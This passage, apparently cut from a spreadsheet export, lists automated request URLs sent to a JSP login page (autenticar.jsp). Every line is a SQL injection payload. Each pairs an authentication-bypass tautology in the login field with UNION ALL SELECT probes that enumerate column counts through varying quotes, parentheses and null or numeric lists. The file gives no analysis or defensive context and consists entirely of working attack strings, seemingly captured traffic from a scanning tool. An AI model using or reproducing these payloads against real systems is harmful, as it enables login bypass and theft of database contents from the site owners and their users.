    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"gtet"="gtet</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"yqig"="yqig</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"cyhu"="cyhu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"ncar"="ncar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#and"ggpy"="ggpy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#and"smeb"="smeb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#and"qnem"="qnem</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("xgxm"like"xgxm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("wyjj"like"wyjj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("opkb"like"opkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("gbps"like"gbps</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("mesq"like"mesq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("vrdz"like"vrdz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("iyvs"like"iyvs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#and("rwjq"like"rwjq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#and("jbjn"like"jbjn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#and("ikhq"like"ikhq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("coww"like"coww</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("hvyk"like"hvyk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("okpv"like"okpv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("rxcx"like"rxcx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("wput"like"wput</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("opel"like"opel</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("djls"like"djls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#and(("feow"like"feow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#and(("pzlt"like"pzlt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#and(("dilj"like"dilj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("epik"like"epik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("kphq"like"kphq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("mqvd"like"mqvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("rodw"like"rodw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("otzs"like"otzs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("jzit"like"jzit</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("dblp"like"dblp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#and((("ivsg"like"ivsg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#and((("thuq"like"thuq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#and((("lmvz"like"lmvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"esal"like"esal</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"jykt"like"jykt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"abeo"like"abeo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"ulij"like"ulij</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"vwzq"like"vwzq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"yrmh"like"yrmh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"tvil"like"tvil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#and"luao"like"luao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#and"qkfe"like"qkfe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#and"xier"like"xier</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637,4637#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294,9294#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824,6824#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880,8880#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959,959#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932,5932#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480,6480#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596,3596#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855,7855#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814,1814#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492,9492#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783,4783#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981,8981#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735,5735#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791,1791#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115,6115#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914,5914#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926,8926#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104,3104#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901,2901#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526,5526#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718,2718#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859,6859#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334,334#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560,3560#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477,477#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500,2500#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404,8404#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657,4657#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289,9289#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168,5168#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038,4038#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945,9945#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812,3812#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325,5325#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405,8405#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066,2066#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337,4337#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555,7555#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182,9182#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258,5258#and(3754=3754</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809#and(1603=1603</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245,8245#and(964=964</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937,8937#and(6325=6325</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027,6027#and(5619=5619</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952,1952#and(8361=8361</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730,1730#and(6001=6001</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283,7283#and(9101=9101</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257,257#and(2=2</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358,7358#and(5652=5652</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102,9102#and((8828=8828</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644,7644#and((8124=8124</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748,8748#and((5951=5951</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507,9507#and((2840=2840</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711,3711#and((8974=8974</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772,9772#and((267=267</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479,5479#and((4451=4451</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018,8018#and((8708=8708</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853,1853#and((1584=1584</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselect9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495,9495#and((8095=8095</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012,8012#and(((2332=2332</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621,4621#and(((9316=9316</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203,4203#and(((6892=6892</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355,3355#and(((4563=4563</t>
  </si>
  <si>
